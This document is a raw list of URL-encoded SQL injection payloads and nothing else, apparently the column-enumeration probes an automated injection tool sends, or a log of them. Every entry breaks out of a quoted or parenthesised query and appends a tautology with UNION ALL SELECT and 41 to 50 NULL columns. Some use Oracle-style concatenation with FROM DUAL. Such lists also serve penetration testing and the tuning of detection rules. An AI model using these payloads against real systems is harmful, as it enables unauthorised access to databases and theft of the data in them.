1%27%29%20WHERE%205529%3D5529%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203439%3D3439%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%205899%3D5899%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203254%3D3254%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%206667%3D6667%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%206488%3D6488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%201856%3D1856%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%205103%3D5103%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%202859%3D2859%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%208471%3D8471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%202336%3D2336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%208526%3D8526%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%203448%3D3448%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%206116%3D6116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%205286%3D5286%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%204246%3D4246%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203366%3D3366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%209128%3D9128%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208976%3D8976%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204893%3D4893%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%202389%3D2389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%201149%3D1149%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208673%3D8673%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%206651%3D6651%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207199%3D7199%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203614%3D3614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20%7C%7C%20%28SELECT%201161%20FROM%20DUAL%20WHERE%204300%3D4300%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206647%20FROM%20DUAL%20WHERE%205491%3D5491%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206575%20FROM%20DUAL%20WHERE%201471%3D1471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206365%20FROM%20DUAL%20WHERE%202986%3D2986%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205684%20FROM%20DUAL%20WHERE%201546%3D1546%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207509%20FROM%20DUAL%20WHERE%209312%3D9312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208000%20FROM%20DUAL%20WHERE%203104%3D3104%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207096%20FROM%20DUAL%20WHERE%207367%3D7367%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207003%20FROM%20DUAL%20WHERE%206598%3D6598%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208348%20FROM%20DUAL%20WHERE%204439%3D4439%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 